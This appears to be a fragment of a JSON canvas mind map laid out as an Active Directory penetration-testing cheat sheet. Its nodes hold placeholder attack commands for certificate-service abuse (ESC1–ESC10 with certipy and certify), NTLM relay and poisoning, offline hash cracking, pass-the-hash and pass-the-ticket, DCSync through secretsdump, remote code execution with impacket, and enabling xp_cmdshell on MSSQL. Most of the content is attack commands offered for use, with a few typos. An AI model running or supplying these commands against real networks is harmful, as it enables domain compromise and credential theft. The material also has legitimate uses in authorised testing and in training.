{"type":"text","text":"Reset accountB UPN","id":"8a609c1e19688e91","x":9840,"y":6435,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn <accountB>@<domain>\n```","id":"f69b05a6442c18db","x":10174,"y":6437,"width":1015,"height":57},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -pn-behalf-of '<domain>\\<user>' -pfx <pfc_file>\n```","id":"591d4db1c96b189d","x":8512,"y":5058,"width":1522,"height":60},
{"type":"text","text":"Issue request","id":"f5c8da4ed138dce9","x":9805,"y":5567,"width":142,"height":60},
{"type":"text","text":"[Kerberos Mapping] ESC9/ESC10 (Case2)","id":"785770222507a4f5","x":11290,"y":6495,"width":348,"height":60},
{"type":"text","text":"[Kerberos Mapping] ESC9/ESC10 (Case1)","id":"397002da0b4015d7","x":11290,"y":6375,"width":348,"height":60},
{"type":"text","text":"Pass the certificate","id":"90c1f9a89ef5df48","x":11728,"y":6434,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"```cmd\ncertify.exe request /ca:<erver>\\<ca-name> /template:\"<vulnerable template name>\" [/altname:\"Admin\"]\n```","id":"ecc8363a5d25f6a4","x":7367,"y":4885,"width":1212,"height":69},
{"type":"text","text":"Pass the certificate","id":"bb9efb366d69f052","x":8701,"y":4855,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"```cmd\ncertify.exe request /ca:<server>\\<ca-name> /template:\"<vulnerable template name>\"\n```","id":"9c672d0158f7dbe4","x":7354,"y":4973,"width":1044,"height":60},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>\n```","id":"b951bf4ff29377a0","x":7354,"y":5058,"width":1044,"height":60},
{"type":"text","text":"Pass the certificate","id":"be00602286141a73","x":10202,"y":5003,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"Pass the certificate","id":"9fcc7a3894ef3e03","x":11728,"y":5567,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p '<password>' -ca <ca_name> -retrieve <request_id>\n```","id":"a1ed1406f13bc6fb","x":10894,"y":5567,"width":744,"height":60},
{"type":"text","text":"```bash\ncertipy ca -u <user>@<domain> -p '<password>' -ca <ca_name> -issue-request <request_id> \n```","id":"7ab260a32e20f511","x":10053,"y":5567,"width":744,"height":60},
{"type":"text","text":"ESC9/ESC10 (Case1)","id":"1ffe2d732172aab2","x":6994,"y":6435,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC10 (Case 2)","id":"b89b5aa13f11ddb0","x":6994,"y":6759,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```bash\ncertipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn Administrator\n```","id":"860112e5110e5cef","x":7231,"y":6434,"width":974,"height":60},
{"type":"text","text":"```bash\ncertipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn '<dc_name$>@<domain>'\n```","id":"90b914ad585e3e3f","x":7231,"y":6759,"width":974,"height":60},
{"type":"text","text":"ESC1 ","id":"68bebda4c336b307","x":8103,"y":6021,"width":102,"height":60,"color":"4"},
{"type":"text","text":"Manage certificate","id":"dc92572d4e39c8e7","x":7003,"y":5565,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy ca -ca <ca_name> -enable-template '<ecs1_vuln_template>' -username <user>@<domain> -password <password>\n```","id":"b62dc14a9a918614","x":7308,"y":5575,"width":940,"height":45},
{"type":"text","text":"ESC4","id":"fc07177e74655d50","x":6799,"y":5279,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```bash\ncertipy shadow auto -username <accountA>@<domain> -p <passA> -account <accountB>\n```","id":"4856715923ecfc4d","x":6121,"y":6600,"width":784,"height":60},
{"type":"text","text":"Vulnerable PKI Object access control","id":"849e4315f3bbfc3a","x":6145,"y":6240,"width":356,"height":60},
{"type":"text","text":"ESC5","id":"a319627459591596","x":6568,"y":6240,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ACL","id":"f60830928f0fdaa1","x":6746,"y":6240,"width":106,"height":60,"color":"#001eff"},
{"type":"text","text":"Misconfigured CA","id":"70717535fc66d6f9","x":6583,"y":6020,"width":182,"height":60},
{"type":"text","text":"ESC6","id":"2d94e5a844d68db9","x":6799,"y":6020,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"certipy / certify.exe (only the flag ATTRIBUTESUBJECTALTNAME2)","id":"1a6c1ee1b40a8e17","x":5871,"y":6080,"width":630,"height":55},
{"type":"text","text":"```powershell\ncertutil -config \"CA_HOST\\CA_NAME\" -getreg \"policy\\EditFlags\"\n```","id":"af593289bca047ee","x":5873,"y":5960,"width":628,"height":60},
{"type":"text","text":"Abuse ATTRIBUTESUBJECTALTNAME2 flag set on CA you can choose any certificate template that permits client authentication","id":"fcbd1a7d26b6c6ec","x":6994,"y":6022,"width":1017,"height":58},
{"type":"text","text":"ESC7","id":"409715948430912e","x":6799,"y":5439,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"Write privilege over a certificate template","id":"a6386b40b3adcfb4","x":6959,"y":5279,"width":355,"height":60},
{"type":"text","text":"```bash\ncertipy template -u <user>@<domain> -p '<oassword>' -template <vuln_template> -save-old -debug\n```","id":"c1e7e7554f2b7f56","x":7366,"y":5279,"width":823,"height":60},
{"type":"text","text":"Manage CA","id":"eb3d9510e5b4938c","x":6994,"y":5380,"width":143,"height":60},
{"type":"text","text":"```bash\ncertipy ca -ca <ca_name> -add-officer '<user>'-username <usre>@<domain> -password <password>\n```","id":"092012cddf2a2af7","x":7210,"y":5380,"width":838,"height":60},
{"type":"text","text":"```cmd\ncertify.exe pkiobjects\n```","id":"d10b55b761e91d58","x":5812,"y":6240,"width":250,"height":60},
{"type":"text","text":"ADCS weak configuration","id":"0a2b7bcd6fdf47d3","x":5140,"y":5960,"width":188,"height":60,"color":"#643900"},
{"type":"text","text":"Get CA flags \n(if remote registery is enabled)","id":"1e0170658d7449da","x":5489,"y":6020,"width":291,"height":60},
{"type":"text","text":"```bash\ncertipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>\n```","id":"aed3ba23d7f7412e","x":5795,"y":5361,"width":659,"height":60},
{"type":"text","text":"Misoncfigured ACL","id":"64a5175f8c36b0c3","x":6501,"y":5361,"width":207,"height":60},
{"type":"text","text":"ESC9/ESC10","id":"641a6cc3b4df27b0","x":5884,"y":6600,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"Get PKI objects information","id":"18a2cf195c97844c","x":5489,"y":6240,"width":250,"height":60},
{"type":"text","text":"Misconfigured Certificate Mapping\n(blind test)","id":"e46bfcb052d45e18","x":5489,"y":6600,"width":291,"height":60},
{"type":"text","text":"Display CA information","id":"e2b26a865de87a89","x":5489,"y":5635,"width":250,"height":60},
{"type":"text","text":"```cmd\ncertify.exe cas\n```","id":"1c41905c377f0822","x":5871,"y":5695,"width":250,"height":60},
{"type":"text","text":"```cmd\ncertutil -TCAInfo\n```","id":"231484eabfbd4443","x":5871,"y":5575,"width":250,"height":60},
{"type":"text","text":"ECS8","id":"608424fbc7b1960e","x":5808,"y":4644,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"Web enrollement is up","id":"73e814526eeb722e","x":5489,"y":4644,"width":250,"height":60},
{"type":"text","text":"Get ACL information","id":"d66e53d52074312c","x":5489,"y":5361,"width":250,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController\n```","id":"4598488f8e6f862b","x":6024,"y":4554,"width":939,"height":60},
{"type":"text","text":"```bash\ncertipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>\n```","id":"75ae932b66e19ffc","x":5828,"y":5028,"width":666,"height":60},
{"type":"text","text":"```bash\nrbcd.py -delegate-from '<rbcd_com>$' -delegate-to '<constrained>$'-dc-ip'<dc>'-action 'write'-hashes '<hash>' <domain>/<constrained>$\n```","id":"ed4f3612aff42b94","x":12437,"y":2822,"width":535,"height":108},
{"type":"text","text":"```cmd\nRubeus s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:CIFS /ptt\n```","id":"bd4c80fb39512382","x":12272,"y":2526,"width":636,"height":60},
{"type":"text","text":"With protocol transition (any) \nObject: msDS-AllowedToDelegateTo \nUAC: TRUST_TO_AUTH_FOR_DELEGATION","id":"102303a2b008c623","x":11103,"y":2417,"width":333,"height":104},
{"type":"text","text":"```cmd\nRubeus asktgt /user:<user> /domain:<domain> /aes256:<AES256 hash>\n```","id":"f3762fe69883d58f","x":11571,"y":2526,"width":636,"height":60},
{"type":"text","text":"```cmd\nRubeus hash /password:<password>\n```","id":"bdc9d39f7befb42c","x":11571,"y":2357,"width":636,"height":60},
{"type":"text","text":"```bloodhound\nMATCH (u:User {owned:true}), (c:Computer{name: \"<MYTARGET.FQDN>\"}), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"d393f78fb3794b82","x":11571,"y":2237,"width":1055,"height":60},
{"type":"text","text":"```bash\nhashcat -m 19700 -a 0 spn.txt rockyou.txt\n```","id":"158b16fd4dd21d5a","x":2915,"y":2226,"width":552,"height":50},
{"type":"text","text":"Kerberos 5 TGS AES256","id":"bd74d584cfd459a0","x":2559,"y":2221,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nhashcat -m 18200 -a 0 AS-REP_roast_hashes rockyou.txt\n```","id":"6536b70581b33332","x":2915,"y":2319,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 2100 -a 0 mscache-hash rockyou.txt\n```","id":"524718ecdc2c84c8","x":2915,"y":2412,"width":552,"height":50},
{"type":"text","text":"Kerberos ASREP","id":"1b82ebdd45787434","x":2559,"y":2314,"width":250,"height":60,"color":"2"},
{"type":"text","text":"MsCache 2 (slow)","id":"e6fc699570842d2b","x":2559,"y":2407,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nsmbclient.py\n```","id":"42b163c28a6085d0","x":768,"y":3065,"width":250,"height":60},
{"type":"text","text":"Possible loot","id":"fc566e1c8a5a13c8","x":1107,"y":2965,"width":139,"height":60,"color":"#ff00dd"},
{"type":"text","text":"User","id":"3d7d2fc5a1b39405","x":1339,"y":3064,"width":250,"height":60,"color":"5"},
{"type":"text","text":"```bash\nresponder -i eth0 --lm\n```","id":"581059a1f1f61cd8","x":768,"y":2964,"width":250,"height":61},
{"type":"text","text":"```bash\nntlmrelayx.py -tf targets.txt -smb2support -socks (-6)\n```","id":"cacdb961592d7028","x":1284,"y":4074,"width":515,"height":50},
{"type":"text","text":"Lateral move (SOCKS)","id":"339a67e60062fb7b","x":1879,"y":4069,"width":250,"height":60,"color":"#7da2de"},
{"type":"text","text":"Find SMB not signed (default on non DC)","id":"a04876a5f7c590dc","x":1290,"y":3786,"width":186,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -wh <attacker_ip> -t smb://<target> -l /tmp -6 -debug\n```","id":"13e940aff1431c21","x":1290,"y":3974,"width":610,"height":50},
{"type":"text","text":"```metasploit\nuser exploit/windows/smb/smb_relay\n```","id":"e0328d1b132e5b98","x":1589,"y":3786,"width":627,"height":61},
{"type":"text","text":"```bash\ncrackmapexec smb $hosts --gen-relay-list relay.txt\n```","id":"a7bdd20e112b04bf","x":1589,"y":3880,"width":627,"height":61},
{"type":"text","text":"```bash\nntlmrelayx.py -t ldaps://<dc> --remove-mic --add-computer <computer_name> <computer_password> --delegate-access -smb2support\n```","id":"b8be3053620311a8","x":1769,"y":3479,"width":726,"height":80},
{"type":"text","text":"remove mic","id":"ff73b9169ed4e0c7","x":1243,"y":3383,"width":250,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t ldap://<dc> --shadow-credentials --shadow-target '<dc>'\n```","id":"f26a2816c74d0192","x":1769,"y":3597,"width":726,"height":50},
{"type":"text","text":"```bash\nntlmrelayx.py --remove-mic --escalate-user <user> -t ldap://<DC_FQDN> -smb2support\n```","id":"d87d315bcdc9effc","x":1769,"y":3383,"width":726,"height":60},
{"type":"text","text":"MS08-068","id":"21ca6925df7eb5e5","x":1018,"y":3282,"width":124,"height":60,"color":"#7c0404"},
{"type":"text","text":"Relay on itself","id":"99c363bf9382b076","x":810,"y":3282,"width":167,"height":60},
{"type":"text","text":"Shadow credentials","id":"ca02bfdfa2ddd406","x":2744,"y":3592,"width":250,"height":60},
{"type":"text","text":"NetNTLMv1","id":"17dc17895d9c3d97","x":1046,"y":3383,"width":136,"height":60},
{"type":"text","text":"NetNtlmv1","id":"6cd7aae84eb27967","x":1339,"y":2860,"width":250,"height":60,"color":"2"},
{"type":"text","text":"NetNtlmv2","id":"406a3ccd2d14dac8","x":1339,"y":2962,"width":250,"height":60,"color":"2"},
{"type":"text","text":"DcSync","id":"9a82e5248b889eb9","x":2746,"y":3383,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"Admin","id":"5943c3df8de646fd","x":1607,"y":3281,"width":250,"height":60},
{"type":"text","text":"```metasploit\nuse exploit/windows/smb/smb_relay\n```\n//Windows200*","id":"8d4aa0e05ef59ade","x":1182,"y":3256,"width":340,"height":112},
{"type":"text","text":"RBCD","id":"efdac6bac6c5ea1e","x":2746,"y":3489,"width":250,"height":60,"color":"#0fd7a5"},
{"type":"text","text":"Pass the ticket","id":"95bd618abb9ed758","x":12999,"y":-3253,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"High Access","id":"9ec9e6a9c7ac8970","x":12969,"y":-3808,"width":180,"height":60,"color":"1"},
{"type":"text","text":"Low Access","id":"6129004a9b224587","x":12969,"y":-3887,"width":180,"height":60,"color":"#969292"},
{"type":"text","text":"Result / Go to","id":"630345c1e7bbd998","x":12649,"y":-3857,"width":164,"height":60},
{"type":"text","text":"```bash\nadd_computer\n```","id":"b7b8eaa092412f22","x":11950,"y":-1308,"width":181,"height":60},
{"type":"text","text":"```bash\nset_rbcd\n```","id":"716ed10df87cb5c0","x":12200,"y":-1308,"width":181,"height":60},
{"type":"text","text":"Pass the ticket","id":"54acb46b0261ec13","x":12131,"y":-1482,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"RBCD","id":"33f93b101f1f107c","x":12465,"y":-1308,"width":117,"height":60,"color":"#2b9c8f"},
{"type":"text","text":"NTLM hash","id":"ea98e23d713767d7","x":11902,"y":-1695,"width":250,"height":60,"color":"2"},
{"type":"text","text":"Authority/system","id":"e7ac25ce91955f6c","x":11902,"y":-1959,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Search files","id":"a0877cb97a150d02","x":11989,"y":-3603,"width":128,"height":58},
{"type":"text","text":"```bash\nxfreerdp /u:<user> /d:<domain> /pth:<hash> /v:$ip\n```","id":"d12f0de3e4aedd8a","x":11966,"y":-3752,"width":563,"height":58},
{"type":"text","text":"```cmd\nRubeus createnetonly /program:C\\Windows\\System32\\[cmd.exe||upnpcont.exe]\n```","id":"7eb7218a9a366c42","x":11684,"y":-3258,"width":651,"height":60},
{"type":"text","text":"Administrator access","id":"8da6580717cc651e","x":11810,"y":-2427,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Pass the ticket","id":"ef380ba4a1c0a417","x":12174,"y":-2538,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"DcSync","id":"17b03f163943fb82","x":11657,"y":-2652,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"```cmd\nRubeus ptt /luid:0xdeadbeef /ticket:<ticket>\n```","id":"6fe29748bf4b3d1d","x":12388,"y":-3258,"width":477,"height":60},
{"type":"text","text":"MSSQL","id":"492882ec54988727","x":12065,"y":-3478,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"```cmd\nRubeus ptt /ticket:<ticket>\n```","id":"eb3b22404ca1e177","x":11684,"y":-3355,"width":381,"height":60},
{"type":"text","text":"impacket-tools: Same as Pass the hash but use :-k and -nopass for impacket","id":"abdc48f8337aadac","x":11657,"y":-2919,"width":619,"height":60},
{"type":"text","text":"DcSync","id":"3ff56e997e327054","x":11685,"y":-2337,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"```bash\ngettgtpkinit.py -cert-pfx \"<pfx_file>\" ^[-pfx-pass \"<cert-password>\"] \"<fqdn_domain>/<user>\" \"<tgt_ccache_file>\"\n```","id":"d7ab01ac3060e67c","x":11529,"y":-1618,"width":517,"height":97},
{"type":"text","text":"```cmd\nRubeus.exe asktgt /user:\"<username>\"/certificate:\"<pfx_file>\" [/password:\"<certificate_password>\"] /domain:\"<fqdn_domain>\" /dc\"<dc>\" /show\n```","id":"407c06f09f18b925","x":11529,"y":-1504,"width":517,"height":94},
{"type":"text","text":"```bash\ncertipy auth-pfx <crt_file> -dc-ip <dc_ip><user>@$ip\n```","id":"2e3ad9e99049c407","x":11529,"y":-1392,"width":517,"height":60},
{"type":"text","text":"```bash\nticketConverter.py <kirbi||ccache> <ccache||kirbi>\n```","id":"96b9aba3086029f3","x":11376,"y":-3007,"width":499,"height":60},
{"type":"text","text":"User","id":"2c54bb0fadd6e4f1","x":11685,"y":-2236,"width":111,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\ncertipy auth-pfx <crt_file> -ldap-shell\n```","id":"ff6a5bb8b9108cab","x":11529,"y":-1308,"width":386,"height":60},
{"type":"text","text":"Search files","id":"4dd8311df35b89cb","x":11404,"y":-1827,"width":250,"height":60},
{"type":"text","text":"DcSync","id":"cb90dda974c11055","x":11685,"y":-2072,"width":111,"height":60,"color":"#8199cf"},
{"type":"text","text":"Administrator access","id":"7937685b9739fcbd","x":12335,"y":-2919,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"```cmd\nRubeus asktgt /user:victim /rc4:<rc4value>\n```","id":"ac99c70d52638a63","x":11123,"y":-3295,"width":406,"height":60},
{"type":"text","text":"MSSQL","id":"0963bca236a30e70","x":11061,"y":-3466,"width":123,"height":60},
{"type":"text","text":"```bash\nexec_as_user <user>\n```","id":"166ec0bda836d1a2","x":11748,"y":-6398,"width":251,"height":50},
{"type":"text","text":"```bash\nsp_linkedservers\n```","id":"b84b1569434b0151","x":11691,"y":-6173,"width":205,"height":45},
{"type":"text","text":"coerce SMB","id":"528dcd29b7b2db32","x":11729,"y":-6258,"width":167,"height":50,"color":"3"},
{"type":"text","text":"```bash\nxp_cmdshell <cmd>\n```","id":"a8dfdc39f5bb2fc3","x":11748,"y":-6478,"width":251,"height":50},
{"type":"text","text":"```bash\nsmbclient.py -hashes \":<hash>\" <user>@$ip\n```","id":"8e922df9b8749b53","x":11364,"y":-3603,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec mssql <ip_range> -u <user> -H ':<hash>'\n```","id":"52c0761c074b946a","x":11364,"y":-3511,"width":602,"height":58},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth -hashes \":<hash>\" <domain>/<user>@$ip\n```","id":"b75c87cc4a77ef29","x":11364,"y":-3435,"width":602,"height":58},
{"type":"text","text":"MSSQL","id":"d0bdb1d4377400da","x":11685,"y":-2144,"width":111,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\ndcomexec.py <domain>/<user>:<password>@$ip\n```","id":"5358fcee7bf8979c","x":11364,"y":-5347,"width":563,"height":58},
{"type":"text","text":"```bash\nsmbexec.py <domain>/<user>:<password>@$ip\n```","id":"193ea2faf40b233a","x":11364,"y":-5503,"width":563,"height":58},
{"type":"text","text":"```bash\nwmiexec.py <domain>/<user>:<password>@$ip\n```","id":"8d8460ac7470dbba","x":11364,"y":-5425,"width":563,"height":58},
{"type":"text","text":"```bash\npsexec.py <domain>/<user>:<password>@$ip\n```","id":"7cbf6152479dc6fc","x":11364,"y":-5886,"width":563,"height":72},
{"type":"text","text":"```powerhell\npsexec.exe -AcceptEULA \\\\>ip>\n```","id":"e5d4cbf3d157a95f","x":11364,"y":-5790,"width":563,"height":72},
{"type":"text","text":"```bash\natexec.py <domain>/<user>:<password>@$ip \"command\"\n```","id":"f3ef46c7d016ade0","x":11364,"y":-5581,"width":563,"height":58},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug sekurlsa::pth /user:>user> /<domain> /ntlm:<hash>\"\n```","id":"bcb3855ba85d4a04","x":11364,"y":-5700,"width":690,"height":60},
{"type":"text","text":"```bash\nevil-winrm -i $ip -u <user> -p <password>\n```","id":"ac2c5b51432e378f","x":11364,"y":-5097,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec mssql <ip_range> -u <user> -p <password>\n```","id":"0a5b37072094a3bb","x":11364,"y":-4831,"width":563,"height":58},
{"type":"text","text":"```bash\nexec_as_login <login>\n```","id":"d49c8c16403d345c","x":11748,"y":-6326,"width":251,"height":50},
{"type":"text","text":"```bash\nenable_xp_cmdshell\n```","id":"3eefb08d27b76a5c","x":11440,"y":-6478,"width":251,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -p <password> -local-auth\n```","id":"be912bfc730df341","x":11364,"y":-5187,"width":563,"height":58},
{"type":"text","text":"RDP","id":"316e923e8a6c9c2a","x":11061,"y":-5020,"width":123,"height":60},
{"type":"text","text":"```bash\nxfreerdp /u:<user> /d:<domain> /p:<password> /v:$ip\n```","id":"75a736f4bf6a7148","x":11364,"y":-5020,"width":563,"height":58},
{"type":"text","text":"```bash\nenum_impersonate\n```","id":"cc5d06d02e9ee344","x":11440,"y":-6370,"width":205,"height":45},
{"type":"text","text":"```bash\nxp_dir_tree $ip\n```","id":"1fd7215a0bf144e6","x":11440,"y":-6256,"width":205,"height":45},
{"type":"text","text":"```bash\ntrustlink\n```","id":"586ccd8f5e303a4e","x":11440,"y":-6173,"width":205,"height":45},
{"type":"text","text":"Administrator access","id":"7b8e1e404ae4d0f9","x":11479,"y":-6047,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"WinRM","id":"e20b38bcf45175f2","x":11061,"y":-5099,"width":123,"height":60},
{"type":"text","text":"pseudo-shell (file write and read)","id":"b0291ff57edbfd5e","x":11061,"y":-5425,"width":193,"height":60},
{"type":"text","text":"WinRM","id":"2c6fc3fe98016840","x":11061,"y":-3864,"width":123,"height":60},
{"type":"text","text":"pseudo-shell (file write and read)","id":"cbd2eed747d27abb","x":11061,"y":-4190,"width":193,"height":60},
{"type":"text","text":"```bash\nwmiexec.py -hashes \":<hash>\"<user>@$ip\n```","id":"9f002722a0fc91c4","x":11364,"y":-4190,"width":563,"height":58},
{"type":"text","text":"```bash\ndcomexec.py -hashes \":<hash>\"<user>@$ip\n```","id":"039bf8693f85ff6e","x":11364,"y":-4112,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -d <domain> -h ':<hash>'\n```","id":"353eca740ba9f8ba","x":11364,"y":-4034,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -h ':<hash>' -local-auth\n```","id":"aef234b3e4e1f202","x":11364,"y":-3952,"width":563,"height":58},
{"type":"text","text":"interactive-shell","id":"f8e269243f8245da","x":11061,"y":-4549,"width":193,"height":60},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug sekurlsa::pth /user:>user> /<domain> /ntlm:<hash>\"\n```","id":"b730413f5a113dca","x":11364,"y":-4465,"width":690,"height":60},
{"type":"text","text":"```bash\nevil-winrm -i $ip -u <user> -H <hash>\n```","id":"d83705f39ba52a57","x":11364,"y":-3862,"width":563,"height":58},
{"type":"text","text":"```bash\nreg.py <domain>/<user>@$ip -hashes ':<hash>' add -keyName 'HKLM\\System\\CurrentControlSet\\Control\\Lsa'-v' DisableRestrictedAdmin'-vt 'REG_DWORD' -vd '0'\n```","id":"9f7677413cbf2861","x":11364,"y":-3778,"width":563,"height":106},
{"type":"text","text":"```bash\nuse_link\n```","id":"729af602d385a93a","x":11964,"y":-6173,"width":135,"height":45},
{"type":"text","text":"Low Access","id":"ff12401a8f924ecf","x":12255,"y":-5099,"width":180,"height":60,"color":"#969292"},
{"type":"text","text":"High Access","id":"06fb69423171c206","x":12255,"y":-5020,"width":180,"height":60,"color":"1"},
{"type":"text","text":"Search files","id":"1a4a3aa0e980b9a6","x":12011,"y":-4923,"width":128,"height":58},
{"type":"text","text":"Authority/system","id":"fd5a6646a0a7098a","x":12197,"y":-4549,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Authority/system","id":"434aa7ffe219d25c","x":12033,"y":-4317,"width":250,"height":60,"color":"1"},
{"type":"text","text":"MSSQL","id":"64d794de16156aa7","x":12067,"y":-6684,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"Low Access","id":"aa275982e9412dba","x":12238,"y":-6815,"width":167,"height":60,"color":"#969292"},
{"type":"text","text":"MSSQL","id":"a1a3656cc5bc4714","x":12071,"y":-6370,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"Low Access","id":"ab12a68c11401142","x":12071,"y":-6483,"width":167,"height":60,"color":"#969292"},
{"type":"text","text":"```bash\nsmbclient.py <domain>/<user>:<password>@$ip\n```","id":"05c6a06a4f5fe27b","x":11364,"y":-4923,"width":563,"height":58},
{"type":"text","text":"SMB","id":"d6b1bd351bdb0db4","x":11061,"y":-4923,"width":123,"height":60},
{"type":"text","text":"MSSQL","id":"0e560d37e7d9103b","x":11061,"y":-4786,"width":123,"height":60},
{"type":"text","text":"MSSQL","id":"3899e6b14509a716","x":12217,"y":-6175,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"Authority/system","id":"3d16b7bdba7a68d1","x":12033,"y":-5552,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Authority/system","id":"1a5f0d2048b9b96d","x":12197,"y":-5784,"width":250,"height":60,"color":"1"},
{"type":"text","text":"MSSQL","id":"faeafe853a8b28c4","x":12011,"y":-4780,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\nenum_db\n```","id":"fe19e7a6b5dd401b","x":11440,"y":-6562,"width":205,"height":45},
{"type":"text","text":"pseudo-shell (file write and read)","id":"e143f98ccc7c7b26","x":10904,"y":-1943,"width":193,"height":60},
{"type":"text","text":"```bash\nproxychains secretsdump -k-aesKey <key> '<domain>'/'<user>'@$ip\n```","id":"6b9a08e4229982ae","x":11043,"y":-2337,"width":583,"height":60},
{"type":"text","text":"```cmd\nSharpSCCM\n```","id":"76d4e4c46d90ade6","x":10951,"y":-7083,"width":192,"height":60},
{"type":"text","text":"```cmd\nPowerSCCM\n```","id":"d59656e862467cc2","x":10951,"y":-7166,"width":192,"height":60},
{"type":"text","text":"```bash\ntgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice \"<service>/<target>\"\n```\n//pr 1256","id":"da35865b9fe0b6b1","x":11260,"y":-2564,"width":776,"height":101},
{"type":"text","text":"```cmd\nmimikatz kerberos::ptc \"<ticket>\"\n```","id":"5ae4c03393407acd","x":11043,"y":-2830,"width":583,"height":60},
{"type":"text","text":"Modify SPN","id":"9a3af01cd21c9b28","x":11043,"y":-2543,"width":149,"height":60},
{"type":"text","text":"```cmd\nRubeus.exe ptt /ticket:<ticket>\n```","id":"22baf16a9c655a41","x":11043,"y":-2746,"width":583,"height":60},
{"type":"text","text":"```bash\nproxychains secretsdump -k '<domain>'/'<user>'@$ip\n```","id":"b4ddd2da54652832","x":11043,"y":-2652,"width":583,"height":60},
{"type":"text","text":"```bash\nproxychains smbclient.py -no-pass <user>@$ip\n```","id":"182950b33bf8ffce","x":10905,"y":-1827,"width":445,"height":60},
{"type":"text","text":"Get hash NTLM from certificate","id":"cf57e6ac7bdc8eb8","x":10904,"y":-1695,"width":328,"height":60},
{"type":"text","text":"impacket-tools: Same as Pass the hash but use : -aesKey for impacket and user FQDN","id":"3da12aca7d713df6","x":11043,"y":-2427,"width":664,"height":60},
{"type":"text","text":"```SQL\nEXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;\n```","id":"fd2d6c3a7895a983","x":11342,"y":-6815,"width":505,"height":60},
{"type":"text","text":"```SQL\nEXECUTE xp_cmdshell '<cmd>'\n```","id":"769aa671fd40f3df","x":11886,"y":-6815,"width":286,"height":60},
{"type":"text","text":"```SQL\nEXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;\n```","id":"2ccaa4426c375582","x":10746,"y":-6815,"width":557,"height":60},
{"type":"text","text":"```bloodhound\nMATCH p=(u:user)-[:SQLAdmin]->(c:Computer) RETURN p\n```","id":"355be0ef365bfded","x":11021,"y":-6905,"width":563,"height":60},
{"type":"text","text":"```bash\ncrackmapexec mssql $ip -u <user> -p <password> -d <domain>\n```","id":"0e06f09db0a348c5","x":11021,"y":-6998,"width":563,"height":60},
{"type":"text","text":"Administrator access","id":"60ef006cd6a2e741","x":11258,"y":-7166,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Convert format","id":"c8eaa0753244cd04","x":11043,"y":-3007,"width":250,"height":60},
{"type":"text","text":"```bash\ngetTGT.py <domain>/<user> -hashes:<hash>\n```","id":"a2072536c9586fb6","x":11123,"y":-3183,"width":406,"height":60},
{"type":"text","text":"```bash\ngetTGT.py-aesKey '<key>' <domain>/<user>@$ip\n```","id":"0194e595c810c0e8","x":11123,"y":-3100,"width":456,"height":60},
{"type":"text","text":"```bash\nimpacket like cleartext password without domain /\n```","id":"4e9086743b15b67c","x":10779,"y":-5986,"width":563,"height":72},
{"type":"text","text":"Users with SQLadmin","id":"c14986eaa6b56fa9","x":10746,"y":-6905,"width":205,"height":60},
